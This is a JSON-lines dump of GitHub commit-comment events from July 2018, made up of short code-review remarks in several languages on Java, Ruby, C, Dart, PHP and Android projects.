{"id":"7910453303","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29575686,"position":26,"line":26,"path":"src/main/java/com/otus/spring/dao/MessageHolderImpl.java","commit_id":"c9ba487a4fd533d8dba6d7908730d4f6cb6fd9ea","created_at":"2018-07-03T06:12:37Z","updated_at":"2018-07-03T06:12:37Z","author_association":"NONE","body":"Сюда можно null передавать просто, если нет аргументов в свойстве."}},"created_at":"2018-07-03T06:12:37Z"}
{"id":"7910454050","type":"CommitCommentEvent","actor":{"login":"tanacchi"},"repo":{"name":"SosysPBL2018/hello_idea"},"payload":{"comment":{"id":29575687,"position":5,"line":4,"path":"app/controllers/ideas_controller.rb","commit_id":"55d1fe7bb6415a755b60ec5df89f3d790027e186","created_at":"2018-07-03T06:12:51Z","updated_at":"2018-07-03T06:12:51Z","author_association":"CONTRIBUTOR","body":"３行目と書き方合わせた方がいいと思った。"}},"created_at":"2018-07-03T06:12:51Z"}
{"id":"7910455232","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29575692,"position":23,"line":20,"path":"src/main/java/com/otus/spring/dao/TestDaoImpl.java","commit_id":"c9ba487a4fd533d8dba6d7908730d4f6cb6fd9ea","created_at":"2018-07-03T06:13:15Z","updated_at":"2018-07-03T06:13:15Z","author_association":"NONE","body":"Вот здесь названия свойств совсем непонятные."}},"created_at":"2018-07-03T06:13:15Z"}
{"id":"7910456013","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29575693,"position":80,"line":1710,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T06:13:31Z","updated_at":"2018-07-03T06:13:31Z","author_association":"NONE","body":"Line 1710 \"return actualMode;\""}},"created_at":"2018-07-03T06:13:31Z"}
{"id":"7910456296","type":"CommitCommentEvent","actor":{"login":"yenifergalarza"},"repo":{"name":"yenifergalarza/lim-2018-05-bc-core-pm-datadashboard"},"payload":{"comment":{"id":29575694,"position":null,"line":null,"path":null,"commit_id":"1dd666d25da1872e8baefe8d8fe5cfeb94220868","created_at":"2018-07-03T06:13:37Z","updated_at":"2018-07-03T06:13:37Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-03T06:13:37Z"}
{"id":"7910456928","type":"CommitCommentEvent","actor":{"login":"PofMagicfingers"},"repo":{"name":"PodShows/podcloud-stats"},"payload":{"comment":{"id":29575695,"position":28,"line":34,"path":"package.json","commit_id":"479d5a2bd6f75def0bea08f3f5f35c07544c9aad","created_at":"2018-07-03T06:13:49Z","updated_at":"2018-07-03T06:13:49Z","author_association":"MEMBER","body":"Lol"}},"created_at":"2018-07-03T06:13:49Z"}
{"id":"7910457989","type":"CommitCommentEvent","actor":{"login":"R3dfinger"},"repo":{"name":"R3dfinger/Project"},"payload":{"comment":{"id":29575697,"position":null,"line":null,"path":null,"commit_id":"bd943442daa0af4ea1ef154b7686510e2bf63f4b","created_at":"2018-07-03T06:14:10Z","updated_at":"2018-07-03T06:14:10Z","author_association":"OWNER","body":"nkljhnkl"}},"created_at":"2018-07-03T06:14:10Z"}
{"id":"7910458678","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29575699,"position":9,"line":17,"path":"pom.xml","commit_id":"d48702470c79926dd07c45672b94d7996777ef18","created_at":"2018-07-03T06:14:22Z","updated_at":"2018-07-03T06:14:22Z","author_association":"NONE","body":"Ура! Красота!"}},"created_at":"2018-07-03T06:14:22Z"}
{"id":"7910461562","type":"CommitCommentEvent","actor":{"login":"cool5a1321"},"repo":{"name":"cool5a1321/cool5A1321ExcelConnect"},"payload":{"comment":{"id":29575703,"position":null,"line":null,"path":null,"commit_id":"afcd6ff17c742ef881092da43570d0b1caf593b4","created_at":"2018-07-03T06:15:16Z","updated_at":"2018-07-03T06:15:16Z","author_association":"OWNER","body":"Merge"}},"created_at":"2018-07-03T06:15:16Z"}
{"id":"7910463306","type":"CommitCommentEvent","actor":{"login":"xenerizes"},"repo":{"name":"xenerizes/models"},"payload":{"comment":{"id":29575710,"position":null,"line":null,"path":null,"commit_id":"4dfb5debc7c0831f2d4de6b23721033c244b0d2c","created_at":"2018-07-03T06:15:50Z","updated_at":"2018-07-03T06:15:50Z","author_association":"OWNER","body":"Hi @turkertopal, I can't believe that my code is the only thing where you can get some ideas about ARIMA -- I followed a detailed instructions in the Influxdata documentation. The idea is just that you run ARIMA in a separate process and Kapacitor transmits the data to it through defined protocol and picks up the results after computation. \r\n\r\nI'm not sure if my solution is up-to-date with the current Kapacitor version, but my solution is based on udf/agent/py/kapacitor/udf/agent.py in the kapacitor repository. It defines necessary classes (which you should inherit) to be ran as a separate process, and udf_pb2.py in the same folder defines the protocol between your custom process and Kapacitor. The only thing that you can get from my code, I suppose, is the format the data is stored. I've just followed the documentation on writing custom Kapacitor UDF (config file should be described there too)."}},"created_at":"2018-07-03T06:15:50Z"}
{"id":"7910463795","type":"CommitCommentEvent","actor":{"login":"Tiogaplanet"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29575713,"position":29,"line":1659,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T06:16:00Z","updated_at":"2018-07-03T06:16:00Z","author_association":"OWNER","body":"@adamgreen OK, should I discard the enable radar and default modes? Or wrap them around `verifiedSetGestureRadarMode(MIP_GESTURE)` and `verifiedSetGestureRadarMode(MIP_RADAR)`  the way `enableRadarMode()` and `enableGestureMode()` do?  Effectively creating alias function calls for the sake of consistency...?"}},"created_at":"2018-07-03T06:16:00Z"}
{"id":"7910464944","type":"CommitCommentEvent","actor":{"login":"deletescape"},"repo":{"name":"BenzoRom/frameworks_base"},"payload":{"comment":{"id":29575715,"position":null,"line":null,"path":null,"commit_id":"96ad58b34eb7d1e50fce74e55d8f3ab306953c94","created_at":"2018-07-03T06:16:22Z","updated_at":"2018-07-03T06:16:22Z","author_association":"CONTRIBUTOR","body":"According to the previous implementation and the review from AOSP devs it is actually supposed to be INVISIBLE, however there were a few other problems which were addressed in yet another patchset"}},"created_at":"2018-07-03T06:16:22Z"}
{"id":"7910467403","type":"CommitCommentEvent","actor":{"login":"tanacchi"},"repo":{"name":"SosysPBL2018/hello_idea"},"payload":{"comment":{"id":29575722,"position":19,"line":51,"path":"app/controllers/ideas_controller.rb","commit_id":"55d1fe7bb6415a755b60ec5df89f3d790027e186","created_at":"2018-07-03T06:17:09Z","updated_at":"2018-07-03T06:17:09Z","author_association":"CONTRIBUTOR","body":"多分どっちでも良いんだろうけど、\r\n```ruby\r\n@idea = current_user.ideas.find_by(id: params[:id])\r\nredirect_to topics_path if @idea.nil?\r\n```\r\nでも同じことが出来る"}},"created_at":"2018-07-03T06:17:09Z"}
{"id":"7910470335","type":"CommitCommentEvent","actor":{"login":"tanacchi"},"repo":{"name":"SosysPBL2018/hello_idea"},"payload":{"comment":{"id":29575726,"position":10,"line":17,"path":"app/views/ideas/show.html.erb","commit_id":"55d1fe7bb6415a755b60ec5df89f3d790027e186","created_at":"2018-07-03T06:18:06Z","updated_at":"2018-07-03T06:18:06Z","author_association":"CONTRIBUTOR","body":"パスの書き方イイね b"}},"created_at":"2018-07-03T06:18:06Z"}
{"id":"7910474127","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29575739,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T06:19:20Z","updated_at":"2018-07-03T06:19:20Z","author_association":"NONE","body":"sadly enough this is not commitable as it is :("}},"created_at":"2018-07-03T06:19:20Z"}
{"id":"7910480987","type":"CommitCommentEvent","actor":{"login":"tanacchi"},"repo":{"name":"SosysPBL2018/hello_idea"},"payload":{"comment":{"id":29575756,"position":4,"line":4,"path":"app/views/topics/edit.html.erb","commit_id":"e3c62d3540fd015d0294b25d7cee5cc59aa345b5","created_at":"2018-07-03T06:21:22Z","updated_at":"2018-07-03T06:21:22Z","author_association":"CONTRIBUTOR","body":"フォームで取得したデータをCreateに送るかUpdateに送るか自動で判別してくれたりせんやたっけ"}},"created_at":"2018-07-03T06:21:22Z"}
{"id":"7910482560","type":"CommitCommentEvent","actor":{"login":"yuq"},"repo":{"name":"harishkrupo/external-mesa"},"payload":{"comment":{"id":29575762,"position":26,"line":1706,"path":"src/egl/drivers/dri2/egl_dri2.c","commit_id":"77dccee24134d9a59c8916fe4dcd734babbad412","created_at":"2018-07-03T06:21:51Z","updated_at":"2018-07-03T06:21:51Z","author_association":"NONE","body":"dri2_set_damage_region should only affect within frame boundaries, so we need to call set_damage_region(dri_ctx, 0, NULL) after swap buffer for reset. I know this patch serial is not ready, just say what I see. Thanks for the implementation."}},"created_at":"2018-07-03T06:21:51Z"}
{"id":"7910507998","type":"CommitCommentEvent","actor":{"login":"karthikkm007"},"repo":{"name":"ResurrectionRemix-Devices/android_device_wingtech_wt88047"},"payload":{"comment":{"id":29575822,"position":null,"line":null,"path":null,"commit_id":"6594229f7b11cad082b98c8ca2226fa340885dba","created_at":"2018-07-03T06:29:18Z","updated_at":"2018-07-03T06:29:18Z","author_association":"CONTRIBUTOR","body":"this quota enable on userdata partition bricked my device\r\nlike\r\n1) TWRP won't be able to mount data\r\n2) While booting  My device stuck at the **message** screen and with factory reset button\r\n   (message = Encryption unsuccessful you may proceed with factory reset "}},"created_at":"2018-07-03T06:29:18Z"}
{"id":"7910516846","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29575840,"position":8,"line":8,"path":"tests/HelloWorldTest.php","commit_id":"7ed44125b9095290ab926eead6392cb4ceb9ff39","created_at":"2018-07-03T06:31:49Z","updated_at":"2018-07-03T06:31:49Z","author_association":"NONE","body":"Tests should not output anything. They only give you true or false for signaling test failure."}},"created_at":"2018-07-03T06:31:49Z"}
{"id":"7910520786","type":"CommitCommentEvent","actor":{"login":"AndroiableDroid"},"repo":{"name":"ResurrectionRemix-Devices/android_device_wingtech_wt88047"},"payload":{"comment":{"id":29575855,"position":null,"line":null,"path":null,"commit_id":"6594229f7b11cad082b98c8ca2226fa340885dba","created_at":"2018-07-03T06:33:00Z","updated_at":"2018-07-03T06:33:00Z","author_association":"NONE","body":"I need your help as I have successfully booted my device via vendor\npartition all device specific blobs moved to vendor partition and without a\nsingle bug\nSend me your telegram username and mine is @androiabledroid\n\nOn 03-Jul-2018 11:59 AM, \"karthik km\" <notifications@github.com> wrote:\n\nthis quota enable on userdata partition bricked my device\nlike\n\n   1. TWRP won't be able to mount data\n   2. While booting My device stuck at the *message* screen and with\n   factory reset button\n   (message = Encryption unsuccessful you may proceed with factory reset\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub\n<https://github.com/ResurrectionRemix-Devices/android_device_wingtech_wt88047/commit/6594229f7b11cad082b98c8ca2226fa340885dba#commitcomment-29575822>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/AWmnMYc06gEYSHmeotuMLPMFOoIOOYeNks5uCw8_gaJpZM4VAUyE>\n.\n"}},"created_at":"2018-07-03T06:33:00Z"}
{"id":"7910525664","type":"CommitCommentEvent","actor":{"login":"knedlsepp"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29575864,"position":null,"line":null,"path":null,"commit_id":"7b01e2b7d6821bb48b9bc8c622af74d735e44a63","created_at":"2018-07-03T06:34:26Z","updated_at":"2018-07-03T06:34:26Z","author_association":"CONTRIBUTOR","body":"Maybe it works with openblasCompat?"}},"created_at":"2018-07-03T06:34:26Z"}
{"id":"7910527006","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29575865,"position":4,"line":4,"path":"composer.json","commit_id":"7ed44125b9095290ab926eead6392cb4ceb9ff39","created_at":"2018-07-03T06:34:50Z","updated_at":"2018-07-03T06:34:50Z","author_association":"NONE","body":"start at 0.0.1 and don't bother with versioning for now. Don't jump to \"alpha\", you're at the beginning of a journey you don't even know. Give clear signals for missing knowledge, don't pretend you already know most of it (which is what \"alpha\" would mean)."}},"created_at":"2018-07-03T06:34:50Z"}
{"id":"7910532158","type":"CommitCommentEvent","actor":{"login":"Shumaister"},"repo":{"name":"Shumaister/FrbaHotel"},"payload":{"comment":{"id":29575869,"position":null,"line":null,"path":null,"commit_id":"523c1f0651c3d13673a92ff7894a4093f6b6d9f4","created_at":"2018-07-03T06:36:19Z","updated_at":"2018-07-03T06:36:19Z","author_association":"OWNER","body":"matenme\r\n"}},"created_at":"2018-07-03T06:36:19Z"}
{"id":"7910534608","type":"CommitCommentEvent","actor":{"login":"harishkrupo"},"repo":{"name":"harishkrupo/external-mesa"},"payload":{"comment":{"id":29575876,"position":26,"line":1706,"path":"src/egl/drivers/dri2/egl_dri2.c","commit_id":"77dccee24134d9a59c8916fe4dcd734babbad412","created_at":"2018-07-03T06:36:58Z","updated_at":"2018-07-03T06:36:58Z","author_association":"OWNER","body":"Ok, thanks for the preliminary review. \r\nShall I fix up this and send it to the ML?"}},"created_at":"2018-07-03T06:36:58Z"}
{"id":"7910536347","type":"CommitCommentEvent","actor":{"login":"mcdachpappe"},"repo":{"name":"Project-Xtended/frameworks_base"},"payload":{"comment":{"id":29575885,"position":null,"line":null,"path":null,"commit_id":"2790b1753d6b46ded8d8c613f0f489630030a761","created_at":"2018-07-03T06:37:26Z","updated_at":"2018-07-03T06:37:26Z","author_association":"NONE","body":" line 6956: protected boolean mUseHeadsUp = false;\r\n\r\nso mUseHeadsUp is always set to false, you have to init it before this check again - i guess"}},"created_at":"2018-07-03T06:37:26Z"}
{"id":"7910536841","type":"CommitCommentEvent","actor":{"login":"LinTheLegend"},"repo":{"name":"Meal-Order-System/DashBoard"},"payload":{"comment":{"id":29575887,"position":null,"line":null,"path":null,"commit_id":"11157633fda9cb94841d67583766de8652e4dbf9","created_at":"2018-07-03T06:37:36Z","updated_at":"2018-07-03T06:37:36Z","author_association":"CONTRIBUTOR","body":"返回值修改"}},"created_at":"2018-07-03T06:37:36Z"}
{"id":"7910537093","type":"CommitCommentEvent","actor":{"login":"yrodiere"},"repo":{"name":"yrodiere/hibernate-orm"},"payload":{"comment":{"id":29575888,"position":46,"line":86,"path":"hibernate-core/src/main/java/org/hibernate/loader/plan/exec/internal/LoadQueryJoinAndFetchProcessor.java","commit_id":"9d5f222f8275dabac2c17399d7d263f2a5120b92","created_at":"2018-07-03T06:37:38Z","updated_at":"2018-07-03T06:37:38Z","author_association":"OWNER","body":"The reason was to make it crash hard (hopefully in our tests) if one attempts to mutate the alias resolution context without checking that he can (`mutableAliasResolutionContext != null`).\r\n\r\nWith a simple boolean, you can forget to check it, and mutate the alias context without being allowed to, and we might not even notice the problem until some complicated test case is provided to us.\r\n\r\nBut I suppose there would be other errors later if that happened? I'm not sure..."}},"created_at":"2018-07-03T06:37:38Z"}
{"id":"7910543242","type":"CommitCommentEvent","actor":{"login":"Dtx-Cuy"},"repo":{"name":"Anime4000/IFME"},"payload":{"comment":{"id":29575899,"position":null,"line":null,"path":null,"commit_id":"c7d5817a0925df2fc140a0dc40719325e7a1e623","created_at":"2018-07-03T06:39:21Z","updated_at":"2018-07-03T06:39:21Z","author_association":"NONE","body":"![edit level](https://user-images.githubusercontent.com/37208534/42202671-73eb2538-7ec6-11e8-919f-3b62282423d7.png)\r\n"}},"created_at":"2018-07-03T06:39:21Z"}
{"id":"7910544403","type":"CommitCommentEvent","actor":{"login":"nvraim"},"repo":{"name":"nvraim/hello-world"},"payload":{"comment":{"id":29575900,"position":null,"line":null,"path":null,"commit_id":"6ac3519fdaa65b3d29be4c39c18a00bd92809d91","created_at":"2018-07-03T06:39:38Z","updated_at":"2018-07-03T06:39:38Z","author_association":"OWNER","body":"I've known github since several years ago, but didn't used it for quite a long time. Now I need to use it again, hence doing this stuff, bla bla bla"}},"created_at":"2018-07-03T06:39:38Z"}
{"id":"7910554081","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29575919,"position":14,"line":400,"path":"builds/install/misc/firebird.conf.in","commit_id":"406b169d96837793ba4f0119fbfba61c1e46df5c","created_at":"2018-07-03T06:42:07Z","updated_at":"2018-07-03T06:42:07Z","author_association":"MEMBER","body":"AuthServer is not a client configuration"}},"created_at":"2018-07-03T06:42:07Z"}
{"id":"7910554301","type":"CommitCommentEvent","actor":{"login":"tomasmoreira04"},"repo":{"name":"Shumaister/FrbaHotel"},"payload":{"comment":{"id":29575921,"position":null,"line":null,"path":null,"commit_id":"523c1f0651c3d13673a92ff7894a4093f6b6d9f4","created_at":"2018-07-03T06:42:11Z","updated_at":"2018-07-03T06:42:11Z","author_association":"COLLABORATOR","body":"Solo nuestro Dios @DPoma puede decidir si te matamos, o si me matan a mí, o si nos matan a los dos."}},"created_at":"2018-07-03T06:42:11Z"}
{"id":"7910554845","type":"CommitCommentEvent","actor":{"login":"lukaseder"},"repo":{"name":"jOOQ/jOOX"},"payload":{"comment":{"id":29575922,"position":null,"line":null,"path":null,"commit_id":"d6ee7adbaa5e5befac41e22c8dbddc7d572d5383","created_at":"2018-07-03T06:42:20Z","updated_at":"2018-07-03T06:42:20Z","author_association":"MEMBER","body":"@dprasannak jOOX 1.6.1 has not been released yet. You can build it yourself very easily off github:\r\n\r\n```\r\n$ git clone https://github.com/jOOQ/jOOX\r\n$ cd jOOX\r\n$ mvn clean install\r\n```"}},"created_at":"2018-07-03T06:42:20Z"}
{"id":"7910555172","type":"CommitCommentEvent","actor":{"login":"masterzorag"},"repo":{"name":"orbisdev/liborbis"},"payload":{"comment":{"id":29575923,"position":null,"line":null,"path":null,"commit_id":"e143c67f7d10708442fd12022329df33b3ede06b","created_at":"2018-07-03T06:42:25Z","updated_at":"2018-07-03T06:42:25Z","author_association":"NONE","body":"The circle helper functions should access the pixelColor by pointers, will test before"}},"created_at":"2018-07-03T06:42:25Z"}
{"id":"7910558207","type":"CommitCommentEvent","actor":{"login":"smilyPooja"},"repo":{"name":"sachinyadav3496/PythonInternBatch2018"},"payload":{"comment":{"id":29575924,"position":null,"line":null,"path":null,"commit_id":"ef600d2ee1f39cdb2da51dc3c59e1beb2aec05ab","created_at":"2018-07-03T06:43:17Z","updated_at":"2018-07-03T06:43:17Z","author_association":"NONE","body":"https://github.com/sachinyadav3496/PythonInternBatch2018/commit/ef600d2ee1f39cdb2da51dc3c59e1beb2aec05ab#diff-7cb3187290fd1069cd9a9d783b6f8901"}},"created_at":"2018-07-03T06:43:17Z"}
{"id":"7910558937","type":"CommitCommentEvent","actor":{"login":"larsbrinkhoff"},"repo":{"name":"silvaCiminia/bitFolder"},"payload":{"comment":{"id":29575927,"position":15,"line":15,"path":"bitFolder.fs","commit_id":"721a8728e1badd12e3246699ac7cbe20af2acc1d","created_at":"2018-07-03T06:43:28Z","updated_at":"2018-07-03T06:43:28Z","author_association":"NONE","body":"Maybe `10240 CONSTANT SIZE`"}},"created_at":"2018-07-03T06:43:28Z"}
{"id":"7910563677","type":"CommitCommentEvent","actor":{"login":"larsbrinkhoff"},"repo":{"name":"RogerLevy/LinkGoesForth"},"payload":{"comment":{"id":29575938,"position":null,"line":null,"path":null,"commit_id":"5b492f65ef125afcd59d25a32709dcc878e9947b","created_at":"2018-07-03T06:44:47Z","updated_at":"2018-07-03T06:44:47Z","author_association":"NONE","body":"Not any more!"}},"created_at":"2018-07-03T06:44:47Z"}
{"id":"7910565738","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":29575940,"position":11,"line":393,"path":"core/src/main/java/org/renjin/methods/Methods.java","commit_id":"8d293d4c1cf560a78557318beea24ddfa8181d65","created_at":"2018-07-03T06:45:22Z","updated_at":"2018-07-03T06:45:22Z","author_association":"MEMBER","body":"Why are you assuming this will be a StringArrayVector? This will fail with any other implementation of StringVector."}},"created_at":"2018-07-03T06:45:22Z"}
{"id":"7910567796","type":"CommitCommentEvent","actor":{"login":"yuq"},"repo":{"name":"harishkrupo/external-mesa"},"payload":{"comment":{"id":29575944,"position":26,"line":1706,"path":"src/egl/drivers/dri2/egl_dri2.c","commit_id":"77dccee24134d9a59c8916fe4dcd734babbad412","created_at":"2018-07-03T06:45:56Z","updated_at":"2018-07-03T06:45:56Z","author_association":"NONE","body":"Yes please. But there should be obviously more changes other than this before it can be send to ML like remove the dri2_dpy->vtbl->set_damage_region and android platform part because I don't see you remove it here. Will you also implement in i965 driver for this callback?"}},"created_at":"2018-07-03T06:45:56Z"}
{"id":"7910571487","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29575950,"position":16,"line":402,"path":"builds/install/misc/firebird.conf.in","commit_id":"406b169d96837793ba4f0119fbfba61c1e46df5c","created_at":"2018-07-03T06:46:54Z","updated_at":"2018-07-03T06:46:54Z","author_association":"MEMBER","body":"It is not clear if server (AuthServer) supports Srp256 plugin. "}},"created_at":"2018-07-03T06:46:54Z"}
{"id":"7910572327","type":"CommitCommentEvent","actor":{"login":"qhuydtvt"},"repo":{"name":"qhuydtvt/lms-webapp"},"payload":{"comment":{"id":29575953,"position":40,"line":40,"path":"src/components/Users/User.detail.js","commit_id":"ed5deb8fb30ad9262f7c37ac1fa0c53f5b1e9f66","created_at":"2018-07-03T06:47:09Z","updated_at":"2018-07-03T06:47:09Z","author_association":"OWNER","body":"Remember to open block, aka. Tab"}},"created_at":"2018-07-03T06:47:09Z"}
{"id":"7910574634","type":"CommitCommentEvent","actor":{"login":"daschuer"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":29575958,"position":11,"line":11,"path":"src/broadcast/networkrequest.h","commit_id":"ba8a6fc86555f743c9280dbecb485576c9fa57ec","created_at":"2018-07-03T06:47:47Z","updated_at":"2018-07-03T06:47:47Z","author_association":"MEMBER","body":"This is redundant."}},"created_at":"2018-07-03T06:47:47Z"}
{"id":"7910579511","type":"CommitCommentEvent","actor":{"login":"DelazJ"},"repo":{"name":"qgis/QGIS-Documentation"},"payload":{"comment":{"id":29575965,"position":null,"line":null,"path":null,"commit_id":"384f5f94feb7e1bd5770c8e711915ea26accbdb7","created_at":"2018-07-03T06:49:06Z","updated_at":"2018-07-03T06:49:06Z","author_association":"CONTRIBUTOR","body":"No you were right. I checked yesterday after your commits and it allows all geometries (i'd have sworn that i checked before my review comment)"}},"created_at":"2018-07-03T06:49:06Z"}
{"id":"7910580085","type":"CommitCommentEvent","actor":{"login":"mathieujobin"},"repo":{"name":"PointyCastle/pointycastle"},"payload":{"comment":{"id":29575966,"position":5,"line":27,"path":"test/modes/cbc_test.dart","commit_id":"5c99c2d15348f7ee41d2566aeb6ed331b40f91e4","created_at":"2018-07-03T06:49:14Z","updated_at":"2018-07-03T06:49:14Z","author_association":"NONE","body":"Why this is not using the CBCBlockCipher class?\r\nAlso, a test with \"AES/CBC\" would be appreciated.\r\n\r\n\"Null/CBC\", means no AES encryption? I did not know it was even possible..."}},"created_at":"2018-07-03T06:49:14Z"}
{"id":"7910580685","type":"CommitCommentEvent","actor":{"login":"Chanbluky"},"repo":{"name":"349zzjau/ChinaHadoop_C4"},"payload":{"comment":{"id":29575967,"position":null,"line":null,"path":null,"commit_id":"17b3960f8884b4f930c70373a84bec6dddf12b26","created_at":"2018-07-03T06:49:23Z","updated_at":"2018-07-03T06:49:23Z","author_association":"NONE","body":"The dataset download source can't be accessed, could you update all the dataset?"}},"created_at":"2018-07-03T06:49:23Z"}
{"id":"7910581221","type":"CommitCommentEvent","actor":{"login":"stevenroose"},"repo":{"name":"PointyCastle/pointycastle"},"payload":{"comment":{"id":29575969,"position":60,"line":64,"path":"test/test/src/helpers.dart","commit_id":"125be9428c9c4b82dc29fee947e28077ae54d46b","created_at":"2018-07-03T06:49:33Z","updated_at":"2018-07-03T06:49:33Z","author_association":"MEMBER","body":"Those should not really be part of Pointy Castle though; it's not related to cryptography. The `dart:convert` library I think can do that. The packages `hex` and `cryptoutils` can also do it. "}},"created_at":"2018-07-03T06:49:33Z"}
{"id":"7910586274","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29575979,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-03T06:50:49Z","updated_at":"2018-07-03T06:50:49Z","author_association":"OWNER","body":"\r\n{ENTER}\r\n[f03072018065037_download.txt](https://github.com/githubuserdlp/TEST/files/2157955/f03072018065037_download.txt)\r\n"}},"created_at":"2018-07-03T06:50:49Z"}
{"id":"7910588200","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":29575982,"position":null,"line":null,"path":null,"commit_id":"db1849f5062936fce2c33056f809fe30346a3370","created_at":"2018-07-03T06:51:19Z","updated_at":"2018-07-03T06:51:19Z","author_association":"MEMBER","body":"aha :wink: seems like somebody forgot this when doing some enhancements. @pascalgrimaud we should add some tests for Gradle microservices as well. I guess you are already on it."}},"created_at":"2018-07-03T06:51:19Z"}
{"id":"7910588346","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29575983,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T06:51:21Z","updated_at":"2018-07-03T06:51:21Z","author_association":"NONE","body":"I don't know about this Frankenstein build, I personally don't trust my yellow patch to scale well. ( ͡° ͜ʖ ͡°)\r\nMaybe test it again at 120 sec to see if it scales well and not just some micro elo accumulating at 60 sec. And/or dissect it with a simplification patch each to see what can be removed. But that's just me, maintainer's should have the final say but I personally wouldn't commit this as it is.\r\n\r\n"}},"created_at":"2018-07-03T06:51:21Z"}
{"id":"7910592546","type":"CommitCommentEvent","actor":{"login":"markgoddard"},"repo":{"name":"stackhpc/ansible-role-os-images"},"payload":{"comment":{"id":29575994,"position":11,"line":145,"path":"tasks/main.yml","commit_id":"e78499a812e9a6370b43e13d33cc1956ebb35987","created_at":"2018-07-03T06:52:24Z","updated_at":"2018-07-03T06:52:24Z","author_association":"MEMBER","body":"Missing a few conditions here"}},"created_at":"2018-07-03T06:52:24Z"}
{"id":"7910592924","type":"CommitCommentEvent","actor":{"login":"markgoddard"},"repo":{"name":"stackhpc/ansible-role-os-images"},"payload":{"comment":{"id":29575995,"position":20,"line":154,"path":"tasks/main.yml","commit_id":"e78499a812e9a6370b43e13d33cc1956ebb35987","created_at":"2018-07-03T06:52:30Z","updated_at":"2018-07-03T06:52:30Z","author_association":"MEMBER","body":"And here"}},"created_at":"2018-07-03T06:52:30Z"}
{"id":"7910599082","type":"CommitCommentEvent","actor":{"login":"AurelioSilver"},"repo":{"name":"AurelioSilver/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29576008,"position":null,"line":null,"path":null,"commit_id":"ea2d42b2254981f424f4e726e7501e7abb05de08","created_at":"2018-07-03T06:54:06Z","updated_at":"2018-07-03T06:54:06Z","author_association":"OWNER","body":"Ok, Text passt doch, weil der Text skaliert."}},"created_at":"2018-07-03T06:54:06Z"}
{"id":"7910606453","type":"CommitCommentEvent","actor":{"login":"oterral"},"repo":{"name":"geoadmin/web-gatekeeper"},"payload":{"comment":{"id":29576026,"position":null,"line":null,"path":null,"commit_id":"4e45712cf1ef1a2654a4bf3e4076cc883edd5100","created_at":"2018-07-03T06:55:58Z","updated_at":"2018-07-03T06:55:58Z","author_association":"NONE","body":"in geoadmin/service-maputnik  , to be allow to save to github the styles from maputnik"}},"created_at":"2018-07-03T06:55:58Z"}
{"id":"7910609705","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576030,"position":23,"line":23,"path":"app/Pincode.php","commit_id":"1869f8d5daf9d0fef999ba87666bbbbeb8a16bf3","created_at":"2018-07-03T06:56:49Z","updated_at":"2018-07-03T06:56:49Z","author_association":"NONE","body":"coding guidelines.\r\n```\r\nif (in_array($taluk, $result['taluk'], true) === false)\r\n```\r\n"}},"created_at":"2018-07-03T06:56:49Z"}
{"id":"7910610713","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576032,"position":33,"line":33,"path":"app/Pincode.php","commit_id":"1869f8d5daf9d0fef999ba87666bbbbeb8a16bf3","created_at":"2018-07-03T06:57:05Z","updated_at":"2018-07-03T06:57:05Z","author_association":"NONE","body":"nit: linebreaks must be even"}},"created_at":"2018-07-03T06:57:05Z"}
{"id":"7910612523","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"abhinavv21/pincodeservice"},"payload":{"comment":{"id":29576043,"position":42,"line":42,"path":"app/Pincode.php","commit_id":"1869f8d5daf9d0fef999ba87666bbbbeb8a16bf3","created_at":"2018-07-03T06:57:35Z","updated_at":"2018-07-03T06:57:35Z","author_association":"NONE","body":"add PHPDoc"}},"created_at":"2018-07-03T06:57:35Z"}
